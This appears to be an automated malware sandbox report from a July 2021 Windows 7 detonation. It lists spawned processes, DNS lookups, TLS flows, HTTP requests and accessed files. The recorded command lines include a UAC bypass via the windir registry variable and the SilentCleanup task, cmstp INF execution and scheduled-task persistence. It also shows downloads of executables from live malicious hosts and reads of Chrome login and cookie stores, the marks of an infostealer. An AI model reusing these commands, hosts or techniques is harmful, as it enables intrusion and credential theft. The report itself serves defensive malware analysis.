Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 19, 2021, 10:31 a.m. | July 19, 2021, 10:55 a.m. |
-
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmpA553.tmp"
3768
-
-
-
rc.exe "C:\Users\test22\AppData\Local\Temp\rc.exe"
2532 -
-
-
reg.exe reg delete hkcu\Environment /v windir /f
2680 -
reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
2996 -
schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
2420
-
-
-
-
reg.exe reg delete hkcu\Environment /v windir /f
3196
-
-
-
-
-
cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\j0fojguc.inf
180
-
-
-
-
-
powershell.exe "powershell" Get-MpPreference -verbose
3488
-
-
-
-
-
schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
1828
-
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "GDSFbnvfghsrf.exe"
2400-
timeout.exe C:\Windows\system32\timeout.exe 3
2136
-
-
-
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 2760 & erase C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe & RD /S /Q C:\\ProgramData\\562700353122373\\* & exit
1096-
taskkill.exe taskkill /pid 2760
2376
-
-
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmp824.tmp"
4024 -
NKHh91jIt3.exe "{path}"
3156
-
-
-
Qv4SXRxX8p.exe "C:\Users\test22\AppData\Local\Temp\Qv4SXRxX8p.exe"
3248
-
-
-
-
cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\kyr1rxzc.inf
3384
-
-
-
KllTrtJVOr.exe "C:\Users\test22\AppData\Local\Temp\KllTrtJVOr.exe"
3476 -
-
-
schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
2092
-
-
-
cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
3584-
timeout.exe timeout /T 10 /NOBREAK
3656
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1532
Name | Response | Post-Analysis Lookup |
---|---|---|
icacxndo.ac.ug | ||
icando.ug | ||
erolasa.ac.ug | 185.215.113.77 | |
telete.in | 195.201.225.248 | |
erolbasa.ac.ug | 185.215.113.77 | |
cdn.discordapp.com | 162.159.130.233 | |
arsaxa.ac.ug | 79.134.225.25 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49170 195.201.225.248:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=telecut.in | 1d:7b:94:0d:d6:f9:85:f3:66:74:d5:1d:98:0c:7a:28:5b:c0:62:44 |
TLSv1 192.168.56.102:49246 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.102:49247 162.159.130.233:443 |
None | None | None |
TLSv1 192.168.56.102:49248 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.102:49249 162.159.130.233:443 |
None | None | None |
TLSv1 192.168.56.102:49308 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.102:49309 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://34.89.184.90/ | ||||||
suspicious_features | POST method with no referer header | suspicious_request | POST http://erolasa.ac.ug/index.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://erolbasa.ac.ug/softokn3.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://34.89.184.90//l/f/K-R3vHoBagrSXdgRybk2/92d554b38e1cae759d4c0d30ca20cfdc6cde1f5f | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://erolbasa.ac.ug/sqlite3.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://erolbasa.ac.ug/freebl3.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://34.89.184.90//l/f/K-R3vHoBagrSXdgRybk2/41412bfae75d7e94b63598d20cc59c28b5b0423e | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://erolbasa.ac.ug/mozglue.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://erolbasa.ac.ug/msvcp140.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://erolbasa.ac.ug/nss3.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/ac.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/rc.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/ds1.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/ds2.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/cc.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://erolbasa.ac.ug/vcruntime140.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://erolbasa.ac.ug/main.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://erolbasa.ac.ug/ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://telete.in/brikitiki |
request | POST http://34.89.184.90/ |
request | POST http://erolasa.ac.ug/index.php |
request | POST http://erolbasa.ac.ug/softokn3.dll |
request | GET http://34.89.184.90//l/f/K-R3vHoBagrSXdgRybk2/92d554b38e1cae759d4c0d30ca20cfdc6cde1f5f |
request | POST http://erolbasa.ac.ug/sqlite3.dll |
request | POST http://erolbasa.ac.ug/freebl3.dll |
request | GET http://34.89.184.90//l/f/K-R3vHoBagrSXdgRybk2/41412bfae75d7e94b63598d20cc59c28b5b0423e |
request | POST http://erolbasa.ac.ug/mozglue.dll |
request | POST http://erolbasa.ac.ug/msvcp140.dll |
request | GET http://erolasa.ac.ug/ac.exe |
request | GET http://erolasa.ac.ug/rc.exe |
request | GET http://erolasa.ac.ug/ds1.exe |
request | GET http://erolasa.ac.ug/ds2.exe |
request | GET http://erolasa.ac.ug/cc.exe |
request | POST http://erolbasa.ac.ug/nss3.dll |
request | GET http://185.215.113.77/ac.exe |
request | GET http://185.215.113.77/rc.exe |
request | GET http://185.215.113.77/ds1.exe |
request | GET http://185.215.113.77/ds2.exe |
request | GET http://185.215.113.77/cc.exe |
request | POST http://erolbasa.ac.ug/vcruntime140.dll |
request | POST http://erolbasa.ac.ug/main.php |
request | POST http://erolbasa.ac.ug/ |
request | GET https://telete.in/brikitiki |
request | GET https://cdn.discordapp.com/attachments/854297276549169165/865182381597786132/Rtzvmiumkiajmdtugitkgokalwbndbk |
request | GET https://cdn.discordapp.com/attachments/854297276549169165/865183364520345620/Ghvhklnnbujpcdbcuiamjnfnpsbioew |
request | POST http://34.89.184.90/ |
request | POST http://erolasa.ac.ug/index.php |
request | POST http://erolbasa.ac.ug/softokn3.dll |
request | POST http://erolbasa.ac.ug/sqlite3.dll |
request | POST http://erolbasa.ac.ug/freebl3.dll |
request | POST http://erolbasa.ac.ug/mozglue.dll |
request | POST http://erolbasa.ac.ug/msvcp140.dll |
request | POST http://erolbasa.ac.ug/nss3.dll |
request | POST http://erolbasa.ac.ug/vcruntime140.dll |
request | POST http://erolbasa.ac.ug/main.php |
request | POST http://erolbasa.ac.ug/ |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs-journal\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Browser\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs-journal\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Cookies |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-util-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-process-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozMapi32.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy_InUse.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\Public\KDECO.bat |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-convert-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-interlocked-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-multibyte-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-memory-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-rtlsupport-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ldif60.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-profile-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\prldap60.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\Public\nest.bat |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-0.dll |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\dd81b5e9d99588633b73117e3b1f84f1a6952f9d573057d804047a85abfb8328_1609fbf0d6c26e---38596704027.pdf.lnk |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\vcruntime140.dll |
file | C:\ProgramData\softokn3.dll |
file | C:\Users\test22\AppData\Local\Temp\ds1.exe |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-profile-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\ac.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\breakpadinjector.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\lgpllibs.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-1.dll |
file | C:\Users\test22\AppData\Local\Temp\rc.exe |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-synch-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-libraryloader-l1-1-0.dll |
file | C:\ProgramData\vcruntime140.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-interlocked-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll |
file | C:\Users\Public\UKO.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click_image.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\msi2.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test_doc.eml.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\office_2007.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\exe1.zip.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test.eml.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\robot.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\air+france+klm+annual+report+2013-RTMD-AMBb5mCGMAAAvhwCAEtSGQASABszRd8A.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\╗τ┐δ╣².txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ok2.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ok1.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test (1).eml.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Settings.ini.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\docx2.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\KMS Activation.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\sn.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\robot2.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.py.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroAI_Click.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\한글2010(정품).lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\readme.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\시리얼넘버.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroCERT.bmp.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\age.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\password.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\jsGIrPlHsPM.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroAI_History.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.py.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\시작프로그램.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\doc.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\dd81b5e9d99588633b73117e3b1f84f1a6952f9d573057d804047a85abfb8328_1609fbf0d6c26e---38596704027.pdf.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroAI_Click.py.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\다운로드.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Python27.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\msi1.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\robot3.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\phishing_file.pdf.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\msoffice2010_32bit.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\doc2.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\KMSAuto_Net_2015_v1.4. 2.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\한글2010(정품) (2).lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test_zip_doc.eml.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\테스트.txt.lnk |
cmdline | C:\Windows\System32\cmd.exe /c C:\Windows\system32\timeout.exe 3 & del "GDSFbnvfghsrf.exe" |
cmdline | cmd.exe /c taskkill /pid 2760 & erase C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe & RD /S /Q C:\\ProgramData\\562700353122373\\* & exit |
cmdline | schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
cmdline | schtasks.exe /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmp824.tmp" |
cmdline | /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe" |
cmdline | C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat |
cmdline | cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE" |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /pid 2760 & erase C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe & RD /S /Q C:\\ProgramData\\562700353122373\\* & exit |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmpA553.tmp" |
cmdline | "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "GDSFbnvfghsrf.exe" |
cmdline | "powershell" Get-MpPreference -verbose |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmp824.tmp" |
cmdline | schtasks.exe /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmpA553.tmp" |
file | C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe |
file | C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe |
file | C:\Users\test22\AppData\Local\Temp\zxcv.EXE |
file | C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe |
file | C:\Users\test22\AppData\Local\Temp\KllTrtJVOr.exe |
file | C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe |
file | C:\Users\test22\AppData\Local\Temp\rc.exe |
file | C:\Users\test22\AppData\Local\Temp\ds1.exe |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-synch-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\zxcv.EXE |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-locale-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\breakpadinjector.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\prldap60.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-debug-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\nss3.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-libraryloader-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\freebl3.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\vcruntime140.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-environment-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\IA2Marshal.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-time-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\mozglue.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-memory-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-sysinfo-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-util-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\msvcp140.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-stdio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\nssdbm3.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-errorhandling-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\qipcap.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-console-l1-1-0.dll |
